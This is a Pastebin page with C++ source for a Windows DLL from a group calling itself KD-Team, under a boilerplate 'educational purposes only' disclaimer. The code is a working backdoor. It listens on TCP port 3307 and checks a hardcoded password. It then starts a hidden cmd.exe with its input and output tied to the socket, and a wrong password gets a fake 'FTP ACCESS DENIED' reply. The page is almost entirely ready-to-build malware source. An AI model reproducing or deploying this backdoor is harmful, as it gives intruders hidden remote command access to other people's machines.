Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- +This is a little Disclaimer for if you havn't read the one on our site. +
- +The tools and tutorials KD-Team develops and publishes are only ment for +
- +educational purpose only.WE DO NOT encourage the use of this tools and +
- +tutorials for mailicious purpose.We learned a lot during the development of them +
- +so we hope you also learn and don't just use it without any brains. +
- +We take completly NO responsability for any damage caused by them nor +
- +are we or our isp responsible for what you do with them. +
- +Greetz: KD-Team +
- +http://www.kd-team.com +
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- */
- #include <winsock2.h>
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- #define SERVPORT 3307
- #define RCVBUFSIZE 32
- #define PASSWORD "itworksihope"
- extern "C" __declspec (dllexport) int shell()
- {
- //normal things for the socket setupt etc
- WSADATA wsa;
- SOCKET hSock;
- SOCKET hLstnSock;
- unsigned int ClientLen;
- struct sockaddr_in ServAddr;
- struct sockaddr_in ClientAddr;
- STARTUPINFO si;
- PROCESS_INFORMATION pi={0};
- int BytesRcvd;
- char *tok;
- char echoBuffer[RCVBUFSIZE];
- char comspec[MAX_PATH];
- //setting up wsa
- if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
- {
- //printf("WSAStartup() failed\n");
- }
- //zeroing out the struct and filling it
- memset(&ServAddr,0,sizeof(ServAddr));
- ServAddr.sin_family = AF_INET;
- ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
- ServAddr.sin_port = htons(SERVPORT);
- //making the socket NOTE it must be WSASocket else it won't pass the handle to the Process
- if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
- {
- //printf("socket() %d failed\n",WSAGetLastError());
- WSACleanup();
- }
- //binding the listening socket.
- if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
- {
- //printf("bind() %d failed\n",WSAGetLastError());
- closesocket(hLstnSock);
- }
- //listening
- if(listen(hLstnSock,1)< 0)
- {
- //printf("listen() %d failed\n",WSAGetLastError());
- closesocket(hLstnSock);
- WSACleanup();
- }
- //the never ending loop :p
- while(1)
- {
- ClientLen = sizeof(ClientAddr);
- //accepting the incomming connection
- hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
- if(hSock == INVALID_SOCKET)
- {
- break;
- }
- BytesRcvd = recv(hSock, echoBuffer,RCVBUFSIZE -1,0);
- if(BytesRcvd > 0)
- {
- //this is the little authentication sequence
- //a strtok() is needed since -1 doens't always do what one wants.
- tok = strtok(echoBuffer,"\n");
- if((strcmp(echoBuffer,PASSWORD))==0)
- {
- //printf("Pass correct\n");
- //when succeeded the actual shell spawning happens.
- memset(&si,0,sizeof(si));
- GetStartupInfo(&si);
- //setting the flags correct
- si.cb = sizeof(si);
- si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
- si.wShowWindow = SW_HIDE;
- si.hStdInput = (HANDLE)hSock;
- si.hStdOutput = (HANDLE)hSock;
- si.hStdError =(HANDLE)hSock;
- //this is just handier then defining cmd.exe by hand.
- if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
- {
- //printf("Environment var failed\n");
- break;
- }
- //creating the process that will create the shell
- if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
- {
- //printf("process creation failed\n");
- break;
- }
- //waiting till finished
- WaitForSingleObject(pi.hProcess, INFINITE);
- //little cleanup
- CloseHandle(pi.hProcess);
- CloseHandle(pi.hThread);
- closesocket(hSock);
- }
- else
- {
- //if auth sequence failed well kick the bastard out.
- //printf("incorrect pass\n");
- send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
- closesocket(hSock);
- }
- }
- }
- closesocket(hLstnSock);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement